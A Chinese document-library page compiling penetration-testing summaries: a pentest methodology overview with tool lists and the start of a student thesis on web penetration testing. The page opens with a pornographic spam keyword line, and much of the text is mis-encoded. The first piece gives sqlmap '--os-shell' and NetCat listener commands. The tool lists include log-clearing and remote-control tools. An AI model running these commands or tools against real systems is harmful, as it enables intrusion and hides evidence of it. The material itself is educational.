欧美色欧美亚洲高清在线观看,国产特黄特色a级在线视频,国产一区视频一区欧美,亚洲成a 人在线观看中文

  1. <ul id="fwlom"></ul>

    <object id="fwlom"></object>

    <span id="fwlom"></span><dfn id="fwlom"></dfn>

      <object id="fwlom"></object>

      滲透測(cè)試總結(jié)(范文)

      時(shí)間:2019-05-12 13:04:19下載本文作者:會(huì)員上傳
      簡(jiǎn)介:寫寫幫文庫(kù)小編為你整理了多篇相關(guān)的《滲透測(cè)試總結(jié)(范文)》,但愿對(duì)你工作學(xué)習(xí)有幫助,當(dāng)然你在寫寫幫文庫(kù)還可以找到更多《滲透測(cè)試總結(jié)(范文)》。

      第一篇:滲透測(cè)試總結(jié)(范文)

      XSS、SQL注入、文件上傳、弱口令、備份信息泄露 XSS ? 分析漏洞成因

      ? 構(gòu)造payload ? NetCat監(jiān)聽端口

      nc.exe-lnvp 8888 ? 利用cookie登錄 ? 獲取權(quán)限

      弱口令

      ? Burpsuit攔截?cái)?shù)據(jù)包 ? Intruder模塊 ? 標(biāo)記密碼 ? 加載字典 ? 開始爆破 ? 查看返回值

      SQL注入

      ? 抓包 ? Decoder as url ? 保存post請(qǐng)求 ? Sqlmap.py

      sqlmap.py-r C:Joomla.txt-p filter[category_id] ? SQLmap OS-shell

      sqlmap.exe-r C:Joomla.txt-p filter[category_id]--os-shell ? 獲取交互式shell

      第二篇:軟件工程-滲透測(cè)試

      火龍果?整理 uml.org.cn

      滲透測(cè)試技術(shù)

      目錄

      1.1滲透測(cè)試概念.....................................................................................................................2 1.2滲透測(cè)試原理.....................................................................................................................2 1.3滲透測(cè)試目標(biāo).....................................................................................................................2 1.4滲透測(cè)試特點(diǎn).....................................................................................................................3 1.5滲透測(cè)試流程和授權(quán).........................................................................................................4

      1.5.1滲透測(cè)試流程..........................................................................................................4 1.5.2滲透測(cè)試授權(quán)..........................................................................................................4 1.6滲透測(cè)試方法.....................................................................................................................5

      1.6.1測(cè)試方法分類..........................................................................................................5 1.6.2信息收集..................................................................................................................5 1.6.3端口掃描..................................................................................................................6 1.6.4權(quán)限提升..................................................................................................................6 1.6.5不同網(wǎng)段/Vlan之間的滲透....................................................................................6 1.6.6溢出測(cè)試..................................................................................................................6 1.6.7SQL注入攻擊..........................................................................................................7 1.6.8檢測(cè)頁(yè)面隱藏字段..................................................................................................7 1.6.9跨站攻擊..................................................................................................................7 1.6.10WEB應(yīng)用測(cè)試.......................................................................................................7 1.6.11代碼審查................................................................................................................8 1.6.12第三方軟件誤配置................................................................................................8 1.6.13Cookie利用............................................................................................................8 1.6.14后門程序檢查........................................................................................................8 1.6.15VOIP測(cè)試..............................................................................................................8

      火龍果?整理 uml.org.cn 1.6.16其他測(cè)試................................................................................................................9 1.7常用滲透測(cè)試工具.............................................................................................................9

      1.7.1應(yīng)用層工具............................................................................................................10 1.7.2系統(tǒng)層工具............................................................................................................10 1.7.3網(wǎng)絡(luò)層工具............................................................................................................10 1.7.4其他方法和工具....................................................................................................11 1.8滲透測(cè)試風(fēng)險(xiǎn)規(guī)避措施...................................................................................................11

      1.1滲透測(cè)試概念

      滲透測(cè)試(Penetration Test), 是完全模擬黑客可能使用的攻擊技術(shù)和漏洞發(fā)現(xiàn)技術(shù),對(duì)目標(biāo)系統(tǒng)的安全做深入的探測(cè),發(fā)現(xiàn)系統(tǒng)最脆弱的環(huán)節(jié)。

      web網(wǎng)絡(luò)滲透測(cè)試:主要通過對(duì)目標(biāo)系統(tǒng)信息的全面收集、對(duì)系統(tǒng)中網(wǎng)路設(shè)備的探測(cè)、對(duì)服務(wù)器系統(tǒng)主機(jī)的漏洞掃描、對(duì)應(yīng)用平臺(tái)及數(shù)據(jù)庫(kù)系統(tǒng)的安全性掃描及通過應(yīng)用系統(tǒng)程序的安全性滲透測(cè)試等手段來(lái)完成對(duì)整個(gè)web系統(tǒng)的安全性滲透檢測(cè)。該滲透測(cè)試是一個(gè)完整、系統(tǒng)的測(cè)試過程,涵蓋了網(wǎng)絡(luò)層面、主機(jī)層面、數(shù)據(jù)層面以及應(yīng)用服務(wù)層面的安全性測(cè)試。

      1.2滲透測(cè)試原理

      滲透測(cè)試主要依據(jù)CVE(Common Vulnerabilities & Exposures公共漏洞和暴露)已經(jīng)發(fā)現(xiàn)的安全漏洞,以及隱患漏洞。模擬入侵者的攻擊方法對(duì)應(yīng)用系統(tǒng)、服務(wù)器系統(tǒng)和網(wǎng)絡(luò)設(shè)備進(jìn)行非破壞性質(zhì)的攻擊性測(cè)試。

      1.3滲透測(cè)試目標(biāo)

      滲透測(cè)試?yán)酶鞣N安全掃描器對(duì)網(wǎng)站及相關(guān)服務(wù)器等設(shè)備進(jìn)行非破壞性質(zhì)的模擬入侵者攻擊,目的是侵入系統(tǒng)并獲取系統(tǒng)信息并將入侵的過程和細(xì)節(jié)總結(jié)編寫成測(cè)試報(bào)告,由此確定存在的安全威脅,并能及時(shí)提醒安全管理員完善安全策略,降低安全風(fēng)險(xiǎn)。

      人工滲透測(cè)試和工具掃描可以很好的互相補(bǔ)充。工具掃描具有很好的效率和速度,但是存在一定的誤報(bào)率,不能發(fā)現(xiàn)高層次、復(fù)雜的安全問題;滲透測(cè)試對(duì)測(cè)試者的專業(yè)技能要

      火龍果?整理 uml.org.cn 求很高(滲透測(cè)試報(bào)告的價(jià)值直接依賴于測(cè)試者的專業(yè)技能),但是非常準(zhǔn)確,可以發(fā)現(xiàn)邏輯性更強(qiáng)、更深層次的弱點(diǎn)。

      1.4滲透測(cè)試特點(diǎn)

      入侵者的攻擊入侵需要利用目標(biāo)網(wǎng)絡(luò)的安全弱點(diǎn),滲透測(cè)試也是同樣的道理。測(cè)試人員模擬真正的入侵者入侵攻擊方法,以人工滲透為主,輔助以攻擊工具的使用,以保證整個(gè)滲透測(cè)試過程都在可以控制和調(diào)整的范圍之內(nèi),同時(shí)確保對(duì)網(wǎng)絡(luò)沒有造成破壞性的損害。

      由于采用可控制的、非破壞性質(zhì)的滲透測(cè)試,因此不會(huì)對(duì)被評(píng)估的客戶信息系統(tǒng)造成嚴(yán)重的影響。在滲透測(cè)試結(jié)束后,客戶信息系統(tǒng)將基本保持一致。

      火龍果?整理 uml.org.cn 1.5滲透測(cè)試流程和授權(quán) 1.5.1滲透測(cè)試流程

      1.5.2滲透測(cè)試授權(quán)

      測(cè)試授權(quán)是進(jìn)行滲透測(cè)試的必要條件。用戶應(yīng)對(duì)滲透測(cè)試所有細(xì)節(jié)和風(fēng)險(xiǎn)的知曉、所有過程都在用戶的控制下進(jìn)行。

      火龍果?整理 uml.org.cn 1.6滲透測(cè)試方法 1.6.1測(cè)試方法分類

      根據(jù)滲透目標(biāo)分類: ? 主機(jī)操作系統(tǒng)滲透:

      對(duì)Windows、Solaris、AIX、Linux、SCO、SGI等操作系統(tǒng)進(jìn)行滲透測(cè)試。? 數(shù)據(jù)庫(kù)系統(tǒng)滲透:

      對(duì)MS-SQL、Oracle、MySQL、Informix、Sybase、DB2等數(shù)據(jù)庫(kù)應(yīng)用系統(tǒng)進(jìn)行滲透測(cè)試。? 應(yīng)用系統(tǒng)滲透:

      對(duì)滲透目標(biāo)提供的各種應(yīng)用,如ASP、CGI、JSP、PHP等組成的004km.cn 信息收集的方法包括主機(jī)網(wǎng)絡(luò)掃描、操作類型判別、應(yīng)用判別、賬號(hào)掃描、配置判別等等。模擬入侵攻擊常用的工具包括Nmap、Nessus、X-Scan等,操作系統(tǒng)中內(nèi)置的許多工具(例如telnet)也可以成為非常有效的模擬攻擊入侵武器。

      1.6.3端口掃描

      通過對(duì)目標(biāo)地址的TCP/UDP端口掃描,確定其所開放的服務(wù)的數(shù)量和類型,這是所有滲透測(cè)試的基礎(chǔ)。通過端口掃描,可以基本確定一個(gè)系統(tǒng)的基本信息,結(jié)合測(cè)試人員的經(jīng)驗(yàn)可以確定其可能存在,以及被利用的安全弱點(diǎn),為進(jìn)行深層次的滲透提供依據(jù)。

      1.6.4權(quán)限提升

      通過收集信息和分析,存在兩種可能性,其一是目標(biāo)系統(tǒng)存在重大弱點(diǎn):測(cè)試人員可以直接控制目標(biāo)系統(tǒng),然后直接調(diào)查目標(biāo)系統(tǒng)中的弱點(diǎn)分布、原因,形成最終的測(cè)試報(bào)告;其二是目標(biāo)系統(tǒng)沒有遠(yuǎn)程重大弱點(diǎn),但是可以獲得遠(yuǎn)程普通權(quán)限,這時(shí)測(cè)試人員可以通過該普通權(quán)限進(jìn)一步收集目標(biāo)系統(tǒng)信息。接下來(lái),盡最大努力獲取本地權(quán)限,收集本地資料信息,尋求本地權(quán)限升級(jí)的機(jī)會(huì)。這些不停的信息收集分析、權(quán)限升級(jí)的結(jié)果將構(gòu)成此次項(xiàng)目整個(gè)滲透測(cè)試過程的輸出。

      1.6.5不同網(wǎng)段/Vlan之間的滲透

      這種滲透方式是從某內(nèi)/外部網(wǎng)段,嘗試對(duì)另一網(wǎng)段/Vlan進(jìn)行滲透。這類測(cè)試通??赡苡玫降募夹g(shù)包括:對(duì)網(wǎng)絡(luò)設(shè)備和無(wú)線設(shè)備的遠(yuǎn)程攻擊;對(duì)防火墻的遠(yuǎn)程攻擊或規(guī)則探測(cè)、規(guī)避嘗試。信息的收集和分析伴隨著每一個(gè)滲透測(cè)試步驟,每一個(gè)步驟又有三個(gè)組成部分:操作、響應(yīng)和結(jié)果分析。

      1.6.6溢出測(cè)試

      當(dāng)測(cè)試人員無(wú)法直接利用帳戶口令登陸系統(tǒng)時(shí),也會(huì)采用系統(tǒng)溢出的方法直接獲得系統(tǒng)控制權(quán)限,此方法有時(shí)會(huì)導(dǎo)致系統(tǒng)死機(jī)或從新啟動(dòng),但不會(huì)導(dǎo)致系統(tǒng)數(shù)據(jù)丟失,如出現(xiàn)死機(jī)等故障,只要將系統(tǒng)從新啟動(dòng)并開啟原有服務(wù)即可。一般情況下,如果未授權(quán),將不會(huì)進(jìn)行此項(xiàng)測(cè)試!

      火龍果?整理 uml.org.cn 1.6.7SQL注入攻擊

      SQL注入常見于應(yīng)用了SQL 數(shù)據(jù)庫(kù)后端的網(wǎng)站服務(wù)器,入侵者通過提交某些特殊SQL語(yǔ)句,最終可能獲取、篡改、控制網(wǎng)站服務(wù)器端數(shù)據(jù)庫(kù)中的內(nèi)容。此類漏洞是入侵者最常用的入侵方式之一。

      1.6.8檢測(cè)頁(yè)面隱藏字段

      網(wǎng)站應(yīng)用系統(tǒng)常采用隱藏字段存儲(chǔ)信息。許多基于網(wǎng)站的電子商務(wù)應(yīng)用程序用隱藏字段來(lái)存儲(chǔ)商品價(jià)格、用戶名、密碼等敏感內(nèi)容。惡意用戶通過操作隱藏字段內(nèi)容達(dá)到惡意交易和竊取信息等行為,是一種非常危險(xiǎn)的漏洞。

      1.6.9跨站攻擊

      入侵者可以借助網(wǎng)站來(lái)攻擊訪問此網(wǎng)站的終端用戶,來(lái)獲得用戶口令或使用站點(diǎn)掛馬來(lái)控制客戶端。

      1.6.10WEB應(yīng)用測(cè)試

      Web腳本及應(yīng)用測(cè)試專門針對(duì)Web及數(shù)據(jù)庫(kù)服務(wù)器進(jìn)行。根據(jù)最新的統(tǒng)計(jì),腳本安全弱點(diǎn)為當(dāng)前Web系統(tǒng),尤其是存在動(dòng)態(tài)內(nèi)容的Web系統(tǒng)比較嚴(yán)重的安全弱點(diǎn)之一。利用腳本相關(guān)弱點(diǎn)輕則可以獲取系統(tǒng)其他目錄的訪問權(quán)限,重則將有可能取得系統(tǒng)的控制權(quán)限。因此對(duì)于含有動(dòng)態(tài)頁(yè)面的Web、數(shù)據(jù)庫(kù)等系統(tǒng),Web腳本及應(yīng)用測(cè)試將是必不可少的一個(gè)環(huán)節(jié)。在Web腳本及應(yīng)用測(cè)試中,可能需要檢查的部份包括:

      ? 檢查應(yīng)用系統(tǒng)架構(gòu),防止用戶繞過系統(tǒng)直接修改數(shù)據(jù)庫(kù); ? 檢查身份認(rèn)證模塊,用以防止非法用戶繞過身份認(rèn)證; ? 檢查數(shù)據(jù)庫(kù)接口模塊,用以防止用戶獲取系統(tǒng)權(quán)限; ? 檢查文件接口模塊,防止用戶獲取系統(tǒng)文件; ? 檢查其他安全威脅;

      火龍果?整理 uml.org.cn 1.6.11代碼審查

      對(duì)受測(cè)業(yè)務(wù)系統(tǒng)站點(diǎn)進(jìn)行安全代碼審查的目的是要識(shí)別出會(huì)導(dǎo)致安全問題和事故的不安全編碼技術(shù)和漏洞。這項(xiàng)工作雖然可能很耗時(shí),但是必須進(jìn)行,代碼審查測(cè)試工作包括如下工作但不僅限于此:

      ? 審查代碼中的XSS腳本漏洞; ? 審查代碼中的 SQL 注入漏洞; ? 審查代碼中的潛在緩沖區(qū)溢出;

      ? 審查識(shí)別允許惡意用戶啟動(dòng)攻擊的不良代碼技術(shù); ? 其他軟件編寫錯(cuò)誤及漏洞的尋找及審查。

      1.6.12第三方軟件誤配置

      第三方軟件的錯(cuò)誤設(shè)置可能導(dǎo)致入侵者利用該漏洞構(gòu)造不同類型的入侵攻擊。

      1.6.13Cookie利用

      網(wǎng)站應(yīng)用系統(tǒng)常使用cookies 機(jī)制在客戶端主機(jī)上保存某些信息,例如用戶ID、口令、時(shí)戳等。入侵者可能通過篡改cookies 內(nèi)容,獲取用戶的賬號(hào),導(dǎo)致嚴(yán)重的后果。

      1.6.14后門程序檢查

      系統(tǒng)開發(fā)過程中遺留的后門和調(diào)試選項(xiàng)可能被入侵者所利用,導(dǎo)致入侵者輕易地從捷徑實(shí)施攻擊。

      1.6.15VOIP測(cè)試

      在對(duì)受測(cè)網(wǎng)絡(luò)進(jìn)行滲透測(cè)試時(shí),將會(huì)進(jìn)行VoIP業(yè)務(wù)的安全測(cè)試,所有影響數(shù)據(jù)網(wǎng)絡(luò)的攻擊都可能會(huì)影響到VoIP網(wǎng)絡(luò),如病毒、垃圾郵件、非法侵入、DoS、劫持電話、偷聽、數(shù)據(jù)嗅探等,因此,首先會(huì)對(duì)VoIP網(wǎng)絡(luò)進(jìn)行安全測(cè)試,接著對(duì)VoIP服務(wù)器進(jìn)行測(cè)試,這些服務(wù)器常常是惡意攻擊者的靶子,因?yàn)樗鼈兪侨魏我粋€(gè)VoIP網(wǎng)絡(luò)的心臟。服務(wù)器存在的致命弱點(diǎn)包括其操作系統(tǒng)、服務(wù)及它所支持的應(yīng)用軟件,可能都會(huì)存在安全漏洞。要將黑客對(duì)服務(wù)

      火龍果?整理 uml.org.cn 器的攻擊降至最小程度,就要對(duì)VoIP網(wǎng)絡(luò)及其服務(wù)器、軟終端進(jìn)行全面的安全測(cè)試,以查找安全隱患,協(xié)助用戶技術(shù)人員修補(bǔ)這些漏洞。

      1.6.16其他測(cè)試

      在滲透測(cè)試中還需要借助暴力破解、網(wǎng)絡(luò)嗅探等其他方法,目的也是為獲取用戶名及密碼。

      1.7常用滲透測(cè)試工具

      可能使用到的命令和工具包括: 命令:

      ? Google搜索和攻擊;

      ? DNS工具:例如:Whois,nslookup, DIG等等; ?

      各種測(cè)試命令;

      ?

      在線網(wǎng)絡(luò)數(shù)據(jù)庫(kù):Ripe, Afrinic, APNIC, ARIN LACNIC 工具:

      ? 主流商業(yè)掃描器:ISS Internet Scanner、NEUUS、Core Impact、NSfocus極光掃描器.? 黑客常用端口掃描器:如:NMAP、Superscan? ? SNMP Sweepers(Solarwinds)?

      ? Website mirror tools(HTTrack, teleport pro)?

      ? 無(wú)線網(wǎng)絡(luò)掃描工具(Netstumbler, Kissmet, Wellenreiter, Airsnort)? WEB漏掃工具AppScan,wvs, WebInspect, Nstalker、nikto、google hack ? 溢出工具:Metasploit ? 破解工具:John the Ripper、THC Hydra、L0phtcrack、Aircrack、Airsnort、Pwdump ? Sniffer工具:Wireshark、Kismet、Tcpdump、Cain and Abel Ettercap、NetStumbler

      火龍果?整理 uml.org.cn 1.7.1應(yīng)用層工具

      ? Acunetix Web Vulnerability Scanner(漏洞掃描工具)

      這是一款網(wǎng)絡(luò)漏洞掃描工具。通過網(wǎng)絡(luò)爬蟲測(cè)試網(wǎng)站安全,檢測(cè)流行的攻擊 ,如跨站點(diǎn)腳本、sql 注入等。在被入侵者攻擊前掃描購(gòu)物車、表格、安全區(qū)域和其他Web應(yīng)用程序。

      1.7.2系統(tǒng)層工具

      ? SSS6.0掃描器漢化版

      Shadow Security Scanner v6.67.58,02月09日發(fā)布,俄羅斯安全界非常專業(yè)的安全漏洞掃描軟件,具有安全掃描,口令檢查,操作系統(tǒng)檢查等強(qiáng)大功能,支持在線升級(jí)。

      ? ISS漏洞掃描器

      ISS(國(guó)際互聯(lián)網(wǎng)安全系統(tǒng)公司)是在信息安全領(lǐng)域中專門致力于反黑客攻擊的專業(yè)公司。目前它的主要產(chǎn)品有四大系列:Real Secure(實(shí)時(shí)入侵監(jiān)測(cè)器)、Internet Scanner(互聯(lián)網(wǎng)掃描器)、System Scanner(系統(tǒng)掃描器)、Database Scanner(數(shù)據(jù)庫(kù)掃描器)。其中Real Secure和Internet Scanner是其拳頭產(chǎn)品,Database Scanner是其獨(dú)有的專用數(shù)據(jù)庫(kù)防黑安全產(chǎn)品。

      ? nmap端口掃描工具

      nmap是目前為止最廣為使用的國(guó)外端口掃描工具之一。它可以很容易的安裝到Windows和unix操作系統(tǒng)中,包括mac os x(通過configure、make、make install等命令)然后對(duì)主機(jī)和網(wǎng)絡(luò)設(shè)備進(jìn)行端口掃描,以尋找目標(biāo)主機(jī)的漏洞。

      1.7.3網(wǎng)絡(luò)層工具

      ? SolarWinds Engineer’s Edition 是一套非常全面的網(wǎng)絡(luò)工具庫(kù),包括了網(wǎng)絡(luò)恢復(fù)、錯(cuò)誤監(jiān)控、性能監(jiān)控和管理工具等。除了包含Professional PLUS Edition中所有的工具外,Engineer’s Edition還增加了新的Swich Port Mapper工具,它可以switch上自動(dòng)執(zhí)行Layer 2和Layer 3恢復(fù)。此工程師版包含了Solarwinds MIB瀏覽器和網(wǎng)絡(luò)性能監(jiān)控器(Network Performance Monitor),以及其他附加網(wǎng)絡(luò)管理工具。

      火龍果?整理 uml.org.cn 1.7.4其他方法和工具

      ? Whois命令——是一種Internet目錄服務(wù),whois提供了在Internet上一臺(tái)主機(jī)或者某個(gè)域的所有者信息,如管理員的姓名、地址、電話號(hào)碼等,這些信息通常保存在Internlc的數(shù)據(jù)庫(kù)內(nèi)。一旦得到了Whois記錄,從查詢的結(jié)果還可以得知primary和secondary域名服務(wù)器的信息。

      ? Nslookup——一種DNS的排錯(cuò)工具,可以使用nslookup命令把你的主機(jī)偽裝成secondaryDNS服務(wù)器,如果成功便可以要求從主DNS服務(wù)器進(jìn)行區(qū)域傳送,如果傳送成功,可以獲得大量有用的信息。

      ? Traceroute——用于路由追蹤,判斷從你的主機(jī)到目標(biāo)主機(jī)經(jīng)過了哪些路由器、跳計(jì)數(shù)、響應(yīng)時(shí)間、路由器通斷情況等,大多數(shù)的操作系統(tǒng)自帶了自己版本的traceroute程序。

      ? 端口掃描程序——專用的對(duì)網(wǎng)絡(luò)端口進(jìn)行掃描的工具,定義好IP地址范圍和端口后就可以開始掃描。

      ? 網(wǎng)絡(luò)偵查和服務(wù)器偵查程序——通過該種程序可以偵查出網(wǎng)絡(luò)上已經(jīng)開啟的端口。如PingPro的工作是是通過監(jiān)控遠(yuǎn)程工程調(diào)用服務(wù)。

      以及測(cè)試人員自行編譯的滲透測(cè)試工具等等。

      1.8滲透測(cè)試風(fēng)險(xiǎn)規(guī)避措施

      滲透測(cè)試過程中可能對(duì)業(yè)務(wù)產(chǎn)生影響,可以采取以下措施來(lái)減小風(fēng)險(xiǎn): ? 在滲透測(cè)試中不使用含有拒絕服務(wù)的測(cè)試策略。? 滲透測(cè)試時(shí)間盡量安排在業(yè)務(wù)量不大的時(shí)段或者晚上。

      ? 在滲透測(cè)試過程中如果出現(xiàn)被評(píng)估系統(tǒng)沒有響應(yīng)的情況,應(yīng)當(dāng)立即停止測(cè)試工作,與用戶相關(guān)人員一起分析情況,在確定原因后,并待正確恢復(fù)系統(tǒng),采取必要的預(yù)防措施(比如調(diào)整測(cè)試策略等)之后,才可以繼續(xù)進(jìn)行。

      ? 測(cè)試人員會(huì)與用戶網(wǎng)站系統(tǒng)和安全管理人員保持良好溝通。隨時(shí)協(xié)商解決出現(xiàn)的各種難題。

      ? 測(cè)試方自控:由滲透測(cè)試方對(duì)本次測(cè)透測(cè)試過程中的三方面數(shù)據(jù)進(jìn)行完整記錄:操作、響應(yīng)、分析,最終形成完整有效的滲透測(cè)試報(bào)告提交給用戶。

      火龍果?整理 uml.org.cn

      一、基于網(wǎng)站的滲透

      1、名稱:Acunetix Web Vulnerability Scanner 6(有收費(fèi)和免費(fèi)兩種版本)

      功能:網(wǎng)站漏洞掃描器。

      平臺(tái):Windows

      2、名稱:IBM Rational AppScan 7.8

      功能:網(wǎng)站漏洞掃描器。

      平臺(tái):Windows

      3、名稱:Jsky

      功能:網(wǎng)站漏洞掃描器。

      平臺(tái):Windows

      4、名稱:DTools

      功能:阿D的多功能入侵工具,帶掃描、植馬等。

      平臺(tái):Windows

      5、名稱:wepoff

      功能:網(wǎng)站漏洞掃描器。

      平臺(tái):Linux / Unix

      6、名稱:Domain3.6

      功能:網(wǎng)站旁注工具。

      平臺(tái):Windows

      7、名稱:casi

      功能:PHP+MYSQL注射工具。

      平臺(tái):Windows

      8、名稱:HP WebInspect 7.7

      功能:網(wǎng)站漏洞掃描器。

      平臺(tái):Windows

      9、名稱:php_bug_scanner

      功能:PHP程序漏洞掃描器。

      平臺(tái):Windows

      10、名稱:多線程網(wǎng)站后臺(tái)掃描工具

      功能:掃描網(wǎng)站后臺(tái)管理登陸地址。

      平臺(tái):Windows

      11、名稱:NStalker

      功能:網(wǎng)站爬蟲。

      平臺(tái):Windows

      12、名稱:挖掘雞 v6.5

      功能:挖掘搜索引擎關(guān)鍵字。

      平臺(tái):Windows

      13、名稱:cookie注入工具

      功能:cookies注入輔助工具。

      平臺(tái):Windows

      火龍果?整理 uml.org.cn

      14、名稱:httpup

      功能:通用HTTP上傳程序。

      平臺(tái):Windows

      二、基于系統(tǒng)的滲透

      1、名稱:nmap

      功能:系統(tǒng)端口掃描器。

      平臺(tái):Windows

      2、名稱:Nessus

      功能:系統(tǒng)漏洞掃描器。

      平臺(tái):Windows

      3、名稱:X-Scan

      功能:系統(tǒng)漏洞掃描器。

      平臺(tái):Windows

      4、名稱:SuperScan

      功能:系統(tǒng)端口掃描器。

      平臺(tái):Windows

      5、名稱:SSS

      功能:SSS掃描器。

      平臺(tái):Windows

      6、名稱:NetCat

      功能:瑞士軍刀。

      平臺(tái):Windows

      7、名稱:Apache Tomcat Crack

      功能:Tomcat弱口令掃描器。

      平臺(tái):Windows

      8、名稱:iisputscanner 功能:中間件掃描器。平臺(tái):Windows

      9、名稱:Metasploit framework

      功能:滲透輔助工具。

      平臺(tái):Windows

      10、名稱:Encoder 功能:編碼轉(zhuǎn)換。平臺(tái):Windows

      11、名稱:awstats 功能:日志分析工具。平臺(tái):Windows

      12、名稱:logclear 功能:日志清除工具。平臺(tái):Windows

      13、名稱:黑刀超級(jí)字典生成器

      功能:密碼生成。

      火龍果?整理 uml.org.cn平臺(tái):Windows

      14、名稱:溯雪

      功能:破解網(wǎng)站、郵箱、BBS登陸密碼。平臺(tái):Windows

      15、名稱:MD5crack 功能:MD5密碼破解工具包。平臺(tái):Windows

      16、名稱:webbench 功能:壓力測(cè)試工具,可用于DDOS。平臺(tái):Linux/Unix

      17、名稱:netstumbler 功能:無(wú)線網(wǎng)絡(luò)攻擊工具。平臺(tái):Windows

      18、名稱:wifizoo 功能:無(wú)線網(wǎng)絡(luò)攻擊工具。平臺(tái):Linux/Unix

      19、名稱:arpsniffer 功能:局域網(wǎng)嗅探抓包。平臺(tái):Windows 20、名稱:ethereal 功能:局域網(wǎng)嗅探抓包。平臺(tái):Windows

      21、名稱:SnifferPro 功能:局域網(wǎng)嗅探抓包。平臺(tái):Windows

      22、名稱:WinSock Expert 功能:網(wǎng)站上傳抓包。平臺(tái):Windows

      23、名稱:logclear 功能:日志清除工具。平臺(tái):Windows

      24、名稱:ByShell、DG遠(yuǎn)控、PcShare、TeamViewer 功能:遠(yuǎn)程控制工具。平臺(tái):Windows

      三、基于數(shù)據(jù)庫(kù)的滲透

      1、名稱:DSQLTools

      功能:啊D 的SQL注入工具。

      平臺(tái):Windows

      2、名稱:nbsi3.0

      功能:MSSQL注入工具。

      火龍果?整理 uml.org.cn

      平臺(tái):Windows

      3、名稱:mysqlweak

      功能:Mysql數(shù)據(jù)庫(kù)弱口令掃描器。

      平臺(tái):Windows

      4、名稱:pangolin

      功能:數(shù)據(jù)庫(kù)注入工具。

      平臺(tái):Windows

      5、名稱:db2utils

      功能:DB2漏洞利用工具。

      平臺(tái):Linux / Unix

      6、名稱:oscanner

      功能:Oracle掃描工具。

      平臺(tái):Windows

      7、名稱:oracle_checkpwd_big

      功能:Oracle弱口令猜解工具。

      平臺(tái):Windows

      第三篇:Web網(wǎng)站滲透測(cè)試論文

      ---------------

      裝 訂 線---------------

      XXX職業(yè)技術(shù)學(xué)院 畢業(yè)設(shè)計(jì)(論文)

      題目: Web網(wǎng)站滲透測(cè)試技術(shù)研究

      (院)信息系 專業(yè)班級(jí) 計(jì)算機(jī)網(wǎng)絡(luò) 學(xué)

      號(hào) 1234567890 學(xué)生姓名 XXX 校內(nèi)導(dǎo)師 XXX 職

      稱 講師 企業(yè)導(dǎo)師 XXX 職

      稱 工程師 企業(yè)導(dǎo)師

      XXX

      工程師

      摘 要: Web網(wǎng)站滲透測(cè)試技術(shù)研究

      隨著網(wǎng)絡(luò)技術(shù)的發(fā)展和應(yīng)用領(lǐng)域的擴(kuò)張,網(wǎng)絡(luò)安全問題越來(lái)越重要。相對(duì)于傳統(tǒng)的系統(tǒng)安全,Web網(wǎng)站的安全得到了越來(lái)越多的重視。首先,越來(lái)越多的網(wǎng)絡(luò)業(yè)務(wù)不再用專門的客戶機(jī)/服務(wù)器模式開發(fā),而是運(yùn)行在Web網(wǎng)站上用瀏覽器統(tǒng)一訪問;其次,和比較成熟的操作系統(tǒng)安全技術(shù)比較,Web網(wǎng)站的安全防護(hù)技術(shù)還不夠完善,當(dāng)前黑客也把大部分注意力集中在Web滲透技術(shù)的發(fā)展上,使Web網(wǎng)站安全總體上面臨相當(dāng)嚴(yán)峻的局面。

      為了確保Web網(wǎng)站的安全,需要采用各種防護(hù)措施。在各種防護(hù)措施中,當(dāng)前最有效的措施是先自己模擬黑客攻擊,對(duì)需要評(píng)估的網(wǎng)站進(jìn)行Web滲透測(cè)試,找到各種安全漏洞后再針對(duì)性進(jìn)行修補(bǔ)。

      本文在對(duì)Web網(wǎng)站滲透測(cè)試技術(shù)進(jìn)行描述的基礎(chǔ)上,配置了一個(gè)實(shí)驗(yàn)用Web網(wǎng)站,然后對(duì)此目標(biāo)網(wǎng)站進(jìn)行了各種黑客滲透攻擊測(cè)試,找出需要修補(bǔ)的安全漏洞,從而加深了對(duì)Web安全攻防的理解,有利于以后各種實(shí)際的網(wǎng)絡(luò)安全防護(hù)工作。

      關(guān)鍵詞:

      網(wǎng)絡(luò)安全;Web網(wǎng)站;滲透測(cè)試

      Web site penetration testing technology research

      Abstract:

      With the expansion of the network technology development and applications, network security issues become increasingly important.Compared with the traditional system security, Web security has got more and more attention.First, more and more network applications no longer develop with specialized client / server model, but run on the Web site and accessed by browser;Secondly, operating system security technology is relatively safe, but secure Web site protection technology is still not perfect, so the most of the current hackers’ attention focused on the development of Web penetration technology, the Web site is facing serious security situation in general.To ensure the security Web site, you need to use a variety of protective measures.In a variety of protective measures, the most effective measure is to own hacking simulation, the need to assess the Web site penetration testing, to find a variety of security vulnerabilities before specific repair.Based on the Web site penetration testing techniques described, the configuration of an experimental Web site, then this target site penetration of various hacker attack test, identify areas that need patching security holes, thereby deepening of Web security offensive understanding, there is conducive to future practical network security protection work.Keywords:

      Network Security, Web sites, penetration testing

      目錄

      第一章 概述................................................................................................1

      1.1 網(wǎng)絡(luò)安全概述..........................................................................................1 1.2 Web網(wǎng)站面臨的威脅...............................................................................1 1.3 Web滲透測(cè)試概述...................................................................................2

      第二章 Web滲透測(cè)試方案設(shè)計(jì)...................................................................4

      2.1 滲透測(cè)試網(wǎng)站創(chuàng)建..................................................................................4 2.2 滲透測(cè)試工具選擇..................................................................................4 2.3滲透測(cè)試方法...........................................................................................5

      第三章 Web滲透測(cè)試過程...........................................................................6

      3.1 掃描測(cè)試Web網(wǎng)站..................................................................................6 3.2 尋找Web安全漏洞..................................................................................7 3.3 SQL注入攻擊測(cè)試...................................................................................9 3.4 XSS跨站攻擊測(cè)試.................................................................................13 3.5 網(wǎng)馬上傳攻擊測(cè)試................................................................................17

      第四章 Web網(wǎng)站防護(hù).................................................................................23

      4.1 網(wǎng)站代碼修復(fù)........................................................................................23 4.2 其它防護(hù)措施........................................................................................24

      總 結(jié).........................................................................................................25 參考文獻(xiàn).....................................................................................................25

      第一章 概述

      1.1 網(wǎng)絡(luò)安全概述

      隨著網(wǎng)絡(luò)技術(shù)的發(fā)展,網(wǎng)絡(luò)已經(jīng)越來(lái)越多地滲透到當(dāng)前社會(huì)生活的方方面面,網(wǎng)上電子商務(wù)、電子政務(wù)、電子金融等業(yè)務(wù)日益普及,網(wǎng)絡(luò)上的敏感數(shù)據(jù)也越來(lái)越多,自然對(duì)網(wǎng)絡(luò)安全提出了更高的要求。

